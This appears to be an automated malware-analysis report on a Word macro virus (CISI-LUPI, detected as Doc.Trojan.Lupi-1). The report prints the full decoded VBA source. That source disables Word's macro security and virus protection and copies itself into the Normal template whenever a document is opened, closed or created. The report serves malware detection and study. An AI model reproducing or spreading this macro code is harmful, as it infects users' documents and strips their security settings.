Office (OLE) malware analysis — malicious · bb427ea30055fa7b

MALICIOUS

Office (OLE)

51.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 17080f5c4fe721c7a9e7c66b1b13138a SHA-1: a248657a766aba05a6507e3df6a267fde3cfeb3a SHA-256: bb427ea30055fa7b251bf12d33e9e43c32a7bcc2f58de838b7ef720de309f40a

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro. The macro attempts to modify Word's security settings and interact with the Normal template, suggesting an attempt to establish persistence or facilitate further infection. The ClamAV detection as 'Doc.Trojan.Lupi-1' and the embedded artifact detection further confirm its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Lupi-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Lupi-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14191 bytes
SHA-256: `9a2d30d2074dac1af239608d0d9dc8af4dc6813c705f4da3a66baf06a512e517`
Detection ClamAV: Win.Trojan.wmvg-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit 'CISI-LUPI v1.02.002 Const virusIDRow = 3 Private Sub Cisi_Lupi() 'Destroy Virus with Virus... 'this is harmless virus 'code created by syarifl@bigfoot.com 'program kecil ini akan mengaktifkan Window VBA, agar 'anda langsung dapat melihat intruder yang masuk ke dalam VBA 'anda. Saya sudah coba dan terbukti sangat efektif untuk user 'dengan tingkat kemahiran menengah. 'On Error Resume Next Dim regs regs = "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security" If System.PrivateProfileString("", regs, "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", regs, "Level") = 1& Else 'CommandBars("Tools").Controls("Macro").Enabled = False With Options .VirusProtection = False .ConfirmConversions = False .SaveNormalPrompt = False End With End If Dim adcp, adver Dim ntcp, ntver Set adcp = ActiveDocument.VBProject.VBComponents(1) Set ntcp = NormalTemplate.VBProject.VBComponents(1) adver = ProcessVersion(adcp.CodeModule.Lines(virusIDRow, 1)) ntver = ProcessVersion(ntcp.CodeModule.Lines(virusIDRow, 1)) Dim adln, ntln adln = adcp.CodeModule.CountOfLines ntln = adcp.CodeModule.CountOfLines Dim src Dim dst Dim ExitNow ExitNow = True If ntver > adver Then Set src = ntcp Set dst = adcp ExitNow = False ElseIf adver > ntver Then Set src = adcp Set dst = ntcp ExitNow = False End If If ExitNow Then Exit Sub Dim i For i = dst.CodeModule.CountOfLines To 1 Step -1 dst.CodeModule.DeleteLines i, 1 Next i For i = 1 To src.CodeModule.CountOfLines dst.CodeModule.InsertLines i, src.CodeModule.Lines(i, 1) Next i If (ntln <> 0) And (adln = 0) And (InStr(1, ActiveDocument.Name, "Document") = 0) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> 0) Then ActiveDocument.Saved = True End If End Sub Private Function ProcessVersion(ver) As Long On Error GoTo ProcessVersion_Err ver = Trim(ver) If ver = "" Then GoTo ProcessVersion_Err ver = Right(ver, 8) Dim x As Long x = Left(ver, 1) * 100000 x = x + Mid(ver, 3, 2) * 1000 x = x + Right(ver, 3) ProcessVersion = x Exit Function ProcessVersion_Err: ProcessVersion = 0 End Function Private Sub MyMsgBox(Prompt) Exit Sub VBA.MsgBox Prompt, vbOKOnly, "CISI-LUPI (" & Me.Name & ")" End Sub Private Sub Document_Open() MyMsgBox "Document_Open" VBE.MainWindow.Visible = True Call Cisi_Lupi End Sub Private Sub Document_Close() MyMsgBox "Document_Close" 'VBE.MainWindow.SetFocus Call Cisi_Lupi End Sub Private Sub Document_New() MyMsgBox "Document_New" 'VBE.MainWindow.SetFocus Call Cisi_Lupi End Sub Private Sub ViewVbCode() MyMsgBox "VBE Setfocus" VBE.MainWindow.SetFocus End Sub Private Sub Resetter() On Error Resume Next Dim i%, j% For i = 1 To CommandBars.Count CommandBars(i).Reset For j = 1 To CommandBars(i).Controls.Count CommandBars(i).Controls(j).Reset Next j Next i CustomizationContext = NormalTemplate KeyBindings.ClearAll End Sub Private Sub cBars() Dim i%, j% For i = 1 To CommandBars.Count Selection.Font.Bold = True Selection.TypeText CommandBars(i).Name Selection.Font.Bold = False Selection.TypeParagraph For j = 1 To CommandBars(i).Controls.Count Selection.TypeText vbTab & CommandBars(i).Controls(j).Caption Selection.TypeParagraph Next j Next i End Sub Private Sub Tester() Dim x As Long x = ProcessVersion(virusID) End Sub ActiveDocument.Saved = False) Then ActiveDocument.Saved = False) Then ActiveDocument.S ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.